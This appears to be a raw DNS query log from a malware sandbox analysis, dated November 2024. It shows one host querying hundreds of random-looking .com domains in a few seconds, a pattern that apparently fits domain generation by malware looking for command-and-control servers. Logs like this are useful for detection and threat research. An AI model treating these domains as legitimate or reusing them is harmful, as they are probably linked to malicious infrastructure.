                                                                                                                                                                                                          Nov 11, 2024 18:24:25.503540993 CET192.168.2.81.1.1.10xdba1Standard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.503703117 CET192.168.2.81.1.1.10x4c84Standard query (0)pumytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.503740072 CET192.168.2.81.1.1.10x268eStandard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.504436016 CET192.168.2.81.1.1.10x499eStandard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.504631996 CET192.168.2.81.1.1.10xf370Standard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.508383036 CET192.168.2.81.1.1.10x4d5fStandard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.508810043 CET192.168.2.81.1.1.10x729Standard query (0)lyxyjod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.523996115 CET192.168.2.81.1.1.10x2a98Standard query (0)galyhib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.540404081 CET192.168.2.81.1.1.10x4d16Standard query (0)vocykec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.540606022 CET192.168.2.81.1.1.10x1318Standard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.542416096 CET192.168.2.81.1.1.10x16ffStandard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.859719038 CET192.168.2.81.1.1.10xd1fbStandard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.860219002 CET192.168.2.81.1.1.10x6aa9Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.860941887 CET192.168.2.81.1.1.10xa9ffStandard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.861131907 CET192.168.2.81.1.1.10x6be4Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.861314058 CET192.168.2.81.1.1.10xe1bbStandard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.861457109 CET192.168.2.81.1.1.10x694aStandard query (0)qegyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.863250971 CET192.168.2.81.1.1.10x37c3Standard query (0)pumyjip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.863670111 CET192.168.2.81.1.1.10x4230Standard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.863863945 CET192.168.2.81.1.1.10x2a84Standard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.864259958 CET192.168.2.81.1.1.10xa6bfStandard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.864383936 CET192.168.2.81.1.1.10xaf2cStandard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.864654064 CET192.168.2.81.1.1.10x24dcStandard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.866213083 CET192.168.2.81.1.1.10xcd9dStandard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.866496086 CET192.168.2.81.1.1.10x6837Standard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.868582010 CET192.168.2.81.1.1.10xf7dbStandard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.871967077 CET192.168.2.81.1.1.10xf02eStandard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.875797987 CET192.168.2.81.1.1.10x6119Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.944689035 CET192.168.2.81.1.1.10x99bbStandard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.043806076 CET192.168.2.81.1.1.10xa4eeStandard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.044399977 CET192.168.2.81.1.1.10x432dStandard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.044576883 CET192.168.2.81.1.1.10x6ef4Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.046649933 CET192.168.2.81.1.1.10xe174Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.046806097 CET192.168.2.81.1.1.10x86d3Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.046891928 CET192.168.2.81.1.1.10x6e01Standard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047094107 CET192.168.2.81.1.1.10x8218Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047094107 CET192.168.2.81.1.1.10x7e67Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047254086 CET192.168.2.81.1.1.10x463eStandard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047333956 CET192.168.2.81.1.1.10xf808Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047441959 CET192.168.2.81.1.1.10xe947Standard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047537088 CET192.168.2.81.1.1.10x63e7Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047617912 CET192.168.2.81.1.1.10xe382Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047755003 CET192.168.2.81.1.1.10x26beStandard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047786951 CET192.168.2.81.1.1.10x7326Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.047974110 CET192.168.2.81.1.1.10x2bb8Standard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.048012972 CET192.168.2.81.1.1.10xd9d9Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.048141956 CET192.168.2.81.1.1.10x604eStandard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.048202991 CET192.168.2.81.1.1.10xf18bStandard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.048396111 CET192.168.2.81.1.1.10x73efStandard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.048618078 CET192.168.2.81.1.1.10x1b5cStandard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.048978090 CET192.168.2.81.1.1.10x47a4Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.050987005 CET192.168.2.81.1.1.10xce77Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.051162958 CET192.168.2.81.1.1.10x31efStandard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.051275015 CET192.168.2.81.1.1.10x71e9Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.051564932 CET192.168.2.81.1.1.10x79c1Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.051584005 CET192.168.2.81.1.1.10x1f37Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.051897049 CET192.168.2.81.1.1.10xb867Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.051975965 CET192.168.2.81.1.1.10xaf6bStandard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.052220106 CET192.168.2.81.1.1.10xa1cfStandard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.052289963 CET192.168.2.81.1.1.10x4fa0Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.052506924 CET192.168.2.81.1.1.10xb419Standard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.052766085 CET192.168.2.81.1.1.10x2c47Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.053205013 CET192.168.2.81.1.1.10x3bfaStandard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.053481102 CET192.168.2.81.1.1.10xedd9Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.053569078 CET192.168.2.81.1.1.10xaabcStandard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.053836107 CET192.168.2.81.1.1.10x36daStandard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.054820061 CET192.168.2.81.1.1.10x1016Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.055160046 CET192.168.2.81.1.1.10xacf3Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.057553053 CET192.168.2.81.1.1.10x9873Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.058624029 CET192.168.2.81.1.1.10x8b41Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.680341005 CET192.168.2.81.1.1.10xfe3bStandard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.142807961 CET192.168.2.81.1.1.10x696aStandard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.143104076 CET192.168.2.81.1.1.10x575aStandard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.144449949 CET192.168.2.81.1.1.10x27b2Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.145946980 CET192.168.2.81.1.1.10x591fStandard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.146138906 CET192.168.2.81.1.1.10x9349Standard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.147505045 CET192.168.2.81.1.1.10xf47eStandard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.150376081 CET192.168.2.81.1.1.10x1454Standard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.156861067 CET192.168.2.81.1.1.10x3ffdStandard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.162700891 CET192.168.2.81.1.1.10x2198Standard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.162729979 CET192.168.2.81.1.1.10x968bStandard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.163642883 CET192.168.2.81.1.1.10xf278Standard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.169131041 CET192.168.2.81.1.1.10x218aStandard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.169404984 CET192.168.2.81.1.1.10x9c88Standard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.173554897 CET192.168.2.81.1.1.10x8f8fStandard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.176326990 CET192.168.2.81.1.1.10x5314Standard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.180794954 CET192.168.2.81.1.1.10x94d9Standard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.181766033 CET192.168.2.81.1.1.10x7588Standard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.266525984 CET192.168.2.81.1.1.10x3c9aStandard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.267201900 CET192.168.2.81.1.1.10x59fStandard query (0)qexykaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.267688036 CET192.168.2.81.1.1.10xebd1Standard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.268639088 CET192.168.2.81.1.1.10xecb2Standard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.269359112 CET192.168.2.81.1.1.10xffedStandard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.269737005 CET192.168.2.81.1.1.10xffb7Standard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.270389080 CET192.168.2.81.1.1.10x4c98Standard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.270623922 CET192.168.2.81.1.1.10x2ccaStandard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.270844936 CET192.168.2.81.1.1.10xf022Standard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.859359026 CET192.168.2.81.1.1.10x6097Standard query (0)puzydal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.859735966 CET192.168.2.81.1.1.10xf145Standard query (0)galydoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.859817028 CET192.168.2.81.1.1.10x4005Standard query (0)qedyleq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.860141039 CET192.168.2.81.1.1.10xf54eStandard query (0)lymymud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.860295057 CET192.168.2.81.1.1.10x48e4Standard query (0)vonymuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.861085892 CET192.168.2.81.1.1.10x49cStandard query (0)qetyrap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.861568928 CET192.168.2.81.1.1.10x19e1Standard query (0)vopyret.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.861735106 CET192.168.2.81.1.1.10x47b2Standard query (0)gahycib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.861927986 CET192.168.2.81.1.1.10xc394Standard query (0)puvygyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.862082958 CET192.168.2.81.1.1.10x9cbbStandard query (0)vojycif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.862672091 CET192.168.2.81.1.1.10x1b18Standard query (0)puryjil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.864553928 CET192.168.2.81.1.1.10x8d9Standard query (0)vonyjim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.865299940 CET192.168.2.81.1.1.10xcffcStandard query (0)lyvyguj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.868648052 CET192.168.2.81.1.1.10x30a4Standard query (0)ganyhuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.868678093 CET192.168.2.81.1.1.10x859Standard query (0)galyvas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.883444071 CET192.168.2.81.1.1.10x26daStandard query (0)gadypuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.883915901 CET192.168.2.81.1.1.10xd26dStandard query (0)qebyhuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.885466099 CET192.168.2.81.1.1.10x3a5dStandard query (0)qegyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.888839960 CET192.168.2.81.1.1.10xedbdStandard query (0)qeqykog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.889105082 CET192.168.2.81.1.1.10xbaacStandard query (0)lymyjon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.889319897 CET192.168.2.81.1.1.10xe42cStandard query (0)pumyjig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.919401884 CET192.168.2.81.1.1.10x7bd7Standard query (0)puzybep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.920979977 CET192.168.2.81.1.1.10x4567Standard query (0)vofypuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.921324968 CET192.168.2.81.1.1.10x47f5Standard query (0)qedytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.921495914 CET192.168.2.81.1.1.10x16a7Standard query (0)lyrywax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.922825098 CET192.168.2.81.1.1.10xbcbbStandard query (0)pupytyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.923007011 CET192.168.2.81.1.1.10x8a49Standard query (0)gacyfew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.923398972 CET192.168.2.81.1.1.10xa1f9Standard query (0)qexyfel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.923558950 CET192.168.2.81.1.1.10xfdf2Standard query (0)pumymuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.923969030 CET192.168.2.81.1.1.10xec44Standard query (0)volybec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.924134970 CET192.168.2.81.1.1.10xf22Standard query (0)qeqyqiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.924354076 CET192.168.2.81.1.1.10x7e4Standard query (0)lykyvod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.924504042 CET192.168.2.81.1.1.10x8755Standard query (0)volydot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.930964947 CET192.168.2.81.1.1.10x6122Standard query (0)purywop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.931524038 CET192.168.2.81.1.1.10xf146Standard query (0)qekyvav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.933687925 CET192.168.2.81.1.1.10x5aa3Standard query (0)gatyrez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.934570074 CET192.168.2.81.1.1.10x9d3bStandard query (0)pujycov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.934952021 CET192.168.2.81.1.1.10x6d14Standard query (0)lysylej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.935211897 CET192.168.2.81.1.1.10x8535Standard query (0)ganynyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.935689926 CET192.168.2.81.1.1.10x17bcStandard query (0)lysytyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.094420910 CET192.168.2.81.1.1.10x2cf0Standard query (0)lyxyfar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.416169882 CET192.168.2.81.1.1.10x3a16Standard query (0)qexyvoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.416476965 CET192.168.2.81.1.1.10xb976Standard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.418514967 CET192.168.2.81.1.1.10x4177Standard query (0)pufytev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.419037104 CET192.168.2.81.1.1.10x1a8dStandard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.419090033 CET192.168.2.81.1.1.10xb4d8Standard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.421283960 CET192.168.2.81.1.1.10xc48aStandard query (0)qekytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.421477079 CET192.168.2.81.1.1.10x646fStandard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.423381090 CET192.168.2.81.1.1.10x62ebStandard query (0)vonybat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.424128056 CET192.168.2.81.1.1.10x9ce6Standard query (0)lysyjid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.433895111 CET192.168.2.81.1.1.10x160bStandard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.441235065 CET192.168.2.81.1.1.10x92aaStandard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.442106962 CET192.168.2.81.1.1.10x82faStandard query (0)vofyref.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.442538977 CET192.168.2.81.1.1.10x20ccStandard query (0)qedykiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.446847916 CET192.168.2.81.1.1.10x2c01Standard query (0)qeqyhup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.453032017 CET192.168.2.81.1.1.10x10b7Standard query (0)puzyciq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.478811026 CET192.168.2.81.1.1.10x3c2Standard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.481283903 CET192.168.2.81.1.1.10x8d3bStandard query (0)pufylap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.481653929 CET192.168.2.81.1.1.10x6e3fStandard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.482588053 CET192.168.2.81.1.1.10x5239Standard query (0)gaqynyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.509675980 CET192.168.2.81.1.1.10x3a4eStandard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.510071993 CET192.168.2.81.1.1.10xbae9Standard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.510128975 CET192.168.2.81.1.1.10x8547Standard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.510423899 CET192.168.2.81.1.1.10x8580Standard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.510746956 CET192.168.2.81.1.1.10x98adStandard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.510876894 CET192.168.2.81.1.1.10xf90dStandard query (0)qegylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.511131048 CET192.168.2.81.1.1.10xb01bStandard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.511177063 CET192.168.2.81.1.1.10x157bStandard query (0)qetyquq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.511571884 CET192.168.2.81.1.1.10xe096Standard query (0)vowymyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.516335011 CET192.168.2.81.1.1.10x7e67Standard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.516415119 CET192.168.2.81.1.1.10x41edStandard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.516663074 CET192.168.2.81.1.1.10xbe61Standard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.516937971 CET192.168.2.81.1.1.10x52a6Standard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.517100096 CET192.168.2.81.1.1.10x64f7Standard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.517254114 CET192.168.2.81.1.1.10xeb87Standard query (0)puzypug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.517405033 CET192.168.2.81.1.1.10xe444Standard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.517606974 CET192.168.2.81.1.1.10xd20dStandard query (0)pupywog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.517676115 CET192.168.2.81.1.1.10x1a7eStandard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.517808914 CET192.168.2.81.1.1.10x1adfStandard query (0)vowyjut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.517962933 CET192.168.2.81.1.1.10x76d7Standard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.517991066 CET192.168.2.81.1.1.10x6683Standard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.518110037 CET192.168.2.81.1.1.10xf72Standard query (0)puvydov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.518210888 CET192.168.2.81.1.1.10xc7d2Standard query (0)gatyqih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.518325090 CET192.168.2.81.1.1.10x2fe5Standard query (0)pujyxyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.518543959 CET192.168.2.81.1.1.10x8eb5Standard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.518698931 CET192.168.2.81.1.1.10xd43Standard query (0)lykyxur.comA (IP address)IN (0x0001)false
